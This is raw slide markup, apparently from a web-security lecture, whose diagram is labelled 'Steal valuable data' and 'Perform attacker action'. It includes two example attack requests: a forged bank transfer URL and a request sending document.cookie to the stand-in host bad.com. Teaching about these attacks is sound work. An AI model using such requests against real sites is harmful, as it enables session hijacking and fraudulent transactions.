              <a:gd name="T11" fmla="*/ 3179 h 471170"/>
              <a:gd name="T12" fmla="*/ 1932 w 471170"/>
              <a:gd name="T13" fmla="*/ 3502 h 471170"/>
              <a:gd name="T14" fmla="*/ 1769 w 471170"/>
              <a:gd name="T15" fmla="*/ 3774 h 471170"/>
              <a:gd name="T16" fmla="*/ 1575 w 471170"/>
              <a:gd name="T17" fmla="*/ 3989 h 471170"/>
              <a:gd name="T18" fmla="*/ 1361 w 471170"/>
              <a:gd name="T19" fmla="*/ 4124 h 471170"/>
              <a:gd name="T20" fmla="*/ 1144 w 471170"/>
              <a:gd name="T21" fmla="*/ 4175 h 471170"/>
              <a:gd name="T22" fmla="*/ 930 w 471170"/>
              <a:gd name="T23" fmla="*/ 4148 h 471170"/>
              <a:gd name="T24" fmla="*/ 724 w 471170"/>
              <a:gd name="T25" fmla="*/ 4044 h 471170"/>
              <a:gd name="T26" fmla="*/ 531 w 471170"/>
              <a:gd name="T27" fmla="*/ 3869 h 471170"/>
              <a:gd name="T28" fmla="*/ 360 w 471170"/>
              <a:gd name="T29" fmla="*/ 3626 h 471170"/>
              <a:gd name="T30" fmla="*/ 214 w 471170"/>
              <a:gd name="T31" fmla="*/ 3320 h 471170"/>
              <a:gd name="T32" fmla="*/ 100 w 471170"/>
              <a:gd name="T33" fmla="*/ 2955 h 471170"/>
              <a:gd name="T34" fmla="*/ 28 w 471170"/>
              <a:gd name="T35" fmla="*/ 2554 h 471170"/>
              <a:gd name="T36" fmla="*/ 0 w 471170"/>
              <a:gd name="T37" fmla="*/ 2147 h 471170"/>
              <a:gd name="T38" fmla="*/ 15 w 471170"/>
              <a:gd name="T39" fmla="*/ 1745 h 471170"/>
              <a:gd name="T40" fmla="*/ 71 w 471170"/>
              <a:gd name="T41" fmla="*/ 1357 h 471170"/>
              <a:gd name="T42" fmla="*/ 164 w 471170"/>
              <a:gd name="T43" fmla="*/ 997 h 471170"/>
              <a:gd name="T44" fmla="*/ 293 w 471170"/>
              <a:gd name="T45" fmla="*/ 675 h 471170"/>
              <a:gd name="T46" fmla="*/ 456 w 471170"/>
              <a:gd name="T47" fmla="*/ 401 h 471170"/>
              <a:gd name="T48" fmla="*/ 651 w 471170"/>
              <a:gd name="T49" fmla="*/ 188 h 471170"/>
              <a:gd name="T50" fmla="*/ 864 w 471170"/>
              <a:gd name="T51" fmla="*/ 52 h 471170"/>
              <a:gd name="T52" fmla="*/ 1080 w 471170"/>
              <a:gd name="T53" fmla="*/ 0 h 471170"/>
              <a:gd name="T54" fmla="*/ 1296 w 471170"/>
              <a:gd name="T55" fmla="*/ 28 h 471170"/>
              <a:gd name="T56" fmla="*/ 1502 w 471170"/>
              <a:gd name="T57" fmla="*/ 132 h 471170"/>
              <a:gd name="T58" fmla="*/ 1694 w 471170"/>
              <a:gd name="T59" fmla="*/ 307 h 471170"/>
              <a:gd name="T60" fmla="*/ 1866 w 471170"/>
              <a:gd name="T61" fmla="*/ 549 h 471170"/>
              <a:gd name="T62" fmla="*/ 2011 w 471170"/>
              <a:gd name="T63" fmla="*/ 856 h 471170"/>
              <a:gd name="T64" fmla="*/ 2125 w 471170"/>
              <a:gd name="T65" fmla="*/ 1221 h 471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1170" h="471170">
                <a:moveTo>
                  <a:pt x="449552" y="137685"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="464888" y="182834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="470745" y="228730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467591" y="274118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455895" y="317745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436126" y="358355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408751" y="394696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374239" y="425513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333059" y="449552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287910" y="464888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242014" y="470745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196626" y="467591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152999" y="455895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112389" y="436126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76048" y="408751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45231" y="374239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21192" y="333059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5856" y="287910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="242014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3153" y="196626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14849" y="152999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34619" y="112389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61993" y="76048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96505" y="45231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137685" y="21193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182834" y="5856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274118" y="3153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317745" y="14849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358355" y="34619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394696" y="61993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425513" y="96505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449552" y="137685"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25399">
            <a:solidFill>
              <a:srgbClr val="0365C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object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703350E6-7934-E140-AA42-C4D03879327C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1200000">
            <a:off x="3430588" y="3730625"/>
            <a:ext cx="406400" cy="346075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2730"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Arrow Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF574A2-425A-6045-A03F-6D29B1319D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2754313" y="3719513"/>
            <a:ext cx="3776662" cy="15509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399D6E87-57A6-BB49-AFAB-71A79DA4DC5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2830513" y="4429125"/>
            <a:ext cx="3752850" cy="15509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60798" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E24F882B-5F36-754E-B38D-FC24F35178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3" y="4953000"/>
            <a:ext cx="2184400" cy="201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object 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235A6007-D68C-1741-BAF5-8D4FC967780F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1260000">
            <a:off x="3451225" y="5765800"/>
            <a:ext cx="2508250" cy="192088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1540"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-22" baseline="3584" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Perform </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="7" baseline="1792" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-67" baseline="1792" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160800" name="object 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AA4B893-47A4-7E4D-A481-78480BDC2762}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1260000">
            <a:off x="3211513" y="5289550"/>
            <a:ext cx="3651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sz="1900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1900">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160801" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E42D049-1B63-5549-A0CF-CA04340A5AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="5173663"/>
            <a:ext cx="334963" cy="388937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 24520203 w 272414"/>
              <a:gd name="T1" fmla="*/ 204627742 h 272414"/>
              <a:gd name="T2" fmla="*/ 25554755 w 272414"/>
              <a:gd name="T3" fmla="*/ 311517633 h 272414"/>
              <a:gd name="T4" fmla="*/ 25306205 w 272414"/>
              <a:gd name="T5" fmla="*/ 417920414 h 272414"/>
              <a:gd name="T6" fmla="*/ 23882822 w 272414"/>
              <a:gd name="T7" fmla="*/ 516352412 h 272414"/>
              <a:gd name="T8" fmla="*/ 21392932 w 272414"/>
              <a:gd name="T9" fmla="*/ 599322685 h 272414"/>
              <a:gd name="T10" fmla="*/ 17944819 w 272414"/>
              <a:gd name="T11" fmla="*/ 659336562 h 272414"/>
              <a:gd name="T12" fmla="*/ 13969615 w 272414"/>
              <a:gd name="T13" fmla="*/ 687162285 h 272414"/>
              <a:gd name="T14" fmla="*/ 10012671 w 272414"/>
              <a:gd name="T15" fmla="*/ 680475123 h 272414"/>
              <a:gd name="T16" fmla="*/ 6352110 w 272414"/>
              <a:gd name="T17" fmla="*/ 642200054 h 272414"/>
              <a:gd name="T18" fmla="*/ 3266524 w 272414"/>
              <a:gd name="T19" fmla="*/ 575250797 h 272414"/>
              <a:gd name="T20" fmla="*/ 1034679 w 272414"/>
              <a:gd name="T21" fmla="*/ 482530086 h 272414"/>
              <a:gd name="T22" fmla="*/ 0 w 272414"/>
              <a:gd name="T23" fmla="*/ 375639739 h 272414"/>
              <a:gd name="T24" fmla="*/ 248480 w 272414"/>
              <a:gd name="T25" fmla="*/ 269238624 h 272414"/>
              <a:gd name="T26" fmla="*/ 1671906 w 272414"/>
              <a:gd name="T27" fmla="*/ 170805521 h 272414"/>
              <a:gd name="T28" fmla="*/ 4161730 w 272414"/>
              <a:gd name="T29" fmla="*/ 87836040 h 272414"/>
              <a:gd name="T30" fmla="*/ 7610078 w 272414"/>
              <a:gd name="T31" fmla="*/ 27820486 h 272414"/>
              <a:gd name="T32" fmla="*/ 11585025 w 272414"/>
              <a:gd name="T33" fmla="*/ 0 h 272414"/>
              <a:gd name="T34" fmla="*/ 15542088 w 272414"/>
              <a:gd name="T35" fmla="*/ 6681950 h 272414"/>
              <a:gd name="T36" fmla="*/ 19202604 w 272414"/>
              <a:gd name="T37" fmla="*/ 44958397 h 272414"/>
              <a:gd name="T38" fmla="*/ 22288237 w 272414"/>
              <a:gd name="T39" fmla="*/ 111907419 h 272414"/>
              <a:gd name="T40" fmla="*/ 24520203 w 272414"/>
              <a:gd name="T41" fmla="*/ 204627742 h 2724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414" h="272414">
                <a:moveTo>
                  <a:pt x="260986" y="80998"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="271999" y="123308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269353" y="165426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254203" y="204388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227701" y="237230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191000" y="260986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148690" y="271999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106572" y="269353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67610" y="254203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34769" y="227701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11012" y="191000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="148690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2645" y="106572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17795" y="67610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44297" y="34768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80999" y="11012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123308" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165426" y="2645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204388" y="17795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237230" y="44297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260986" y="80998"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9822">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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58EE167C-3103-3D44-85D2-CD8F9703A91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725738" y="4778375"/>
            <a:ext cx="3933825" cy="16224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0" name="object 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A51BADAD-C03F-1F4B-A442-9780864CFF24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3170238" y="6826250"/>
            <a:ext cx="6424612" cy="287338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="17114" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="30430" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http://bank.com/transfer?amt=9999&amp;to=attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2C2060-27EB-344B-97D8-FBD08CF58251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500063" y="1546225"/>
            <a:ext cx="5518150" cy="284163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="13311" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="31696" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-60" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>http://bad.com/steal?c=document.cookie</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D7C7AF2-3246-CF45-A1A6-F3D48371E755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20640000">
            <a:off x="3559175" y="2633663"/>
            <a:ext cx="2195513" cy="192087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1545"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Steal </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="7" baseline="1792" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>valuable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-112" baseline="1792" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="22" baseline="5376" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="2800" baseline="5376" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160806" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADD0C966-A464-3642-9C16-25C675DF8399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-1020000">
            <a:off x="3359150" y="2930525"/>
            <a:ext cx="2698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sz="1900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1900">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160807" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A31F79-4121-3F47-892D-33D27EE874E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="2895600"/>
            <a:ext cx="269875" cy="269875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 188594 w 270510"/>
              <a:gd name="T1" fmla="*/ 13714 h 270510"/>
              <a:gd name="T2" fmla="*/ 221639 w 270510"/>
              <a:gd name="T3" fmla="*/ 38684 h 270510"/>
              <a:gd name="T4" fmla="*/ 244420 w 270510"/>
              <a:gd name="T5" fmla="*/ 71538 h 270510"/>
              <a:gd name="T6" fmla="*/ 256057 w 270510"/>
              <a:gd name="T7" fmla="*/ 109396 h 270510"/>
              <a:gd name="T8" fmla="*/ 255658 w 270510"/>
              <a:gd name="T9" fmla="*/ 149375 h 270510"/>
              <a:gd name="T10" fmla="*/ 242342 w 270510"/>
              <a:gd name="T11" fmla="*/ 188594 h 270510"/>
              <a:gd name="T12" fmla="*/ 217370 w 270510"/>
              <a:gd name="T13" fmla="*/ 221639 h 270510"/>
              <a:gd name="T14" fmla="*/ 184518 w 270510"/>
              <a:gd name="T15" fmla="*/ 244420 h 270510"/>
              <a:gd name="T16" fmla="*/ 146660 w 270510"/>
              <a:gd name="T17" fmla="*/ 256057 h 270510"/>
              <a:gd name="T18" fmla="*/ 106682 w 270510"/>
              <a:gd name="T19" fmla="*/ 255658 h 270510"/>
              <a:gd name="T20" fmla="*/ 67461 w 270510"/>
              <a:gd name="T21" fmla="*/ 242343 h 270510"/>
              <a:gd name="T22" fmla="*/ 34417 w 270510"/>
              <a:gd name="T23" fmla="*/ 217370 h 270510"/>
              <a:gd name="T24" fmla="*/ 11634 w 270510"/>
              <a:gd name="T25" fmla="*/ 184518 h 270510"/>
              <a:gd name="T26" fmla="*/ 0 w 270510"/>
              <a:gd name="T27" fmla="*/ 146660 h 270510"/>
              <a:gd name="T28" fmla="*/ 396 w 270510"/>
              <a:gd name="T29" fmla="*/ 106682 h 270510"/>
              <a:gd name="T30" fmla="*/ 13714 w 270510"/>
              <a:gd name="T31" fmla="*/ 67461 h 270510"/>
              <a:gd name="T32" fmla="*/ 38684 w 270510"/>
              <a:gd name="T33" fmla="*/ 34418 h 270510"/>
              <a:gd name="T34" fmla="*/ 71538 w 270510"/>
              <a:gd name="T35" fmla="*/ 11634 h 270510"/>
              <a:gd name="T36" fmla="*/ 109396 w 270510"/>
              <a:gd name="T37" fmla="*/ 0 h 270510"/>
              <a:gd name="T38" fmla="*/ 149375 w 270510"/>
              <a:gd name="T39" fmla="*/ 396 h 270510"/>
              <a:gd name="T40" fmla="*/ 188594 w 270510"/>
              <a:gd name="T41" fmla="*/ 13714 h 2705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0510" h="270510">
                <a:moveTo>
                  <a:pt x="199069" y="14475"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="233949" y="40833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257996" y="75512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270278" y="115472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269858" y="157671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="255802" y="199069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229444" y="233949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194765" y="257996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154806" y="270278"/>
                </a:lnTo>
                <a:lnTo>
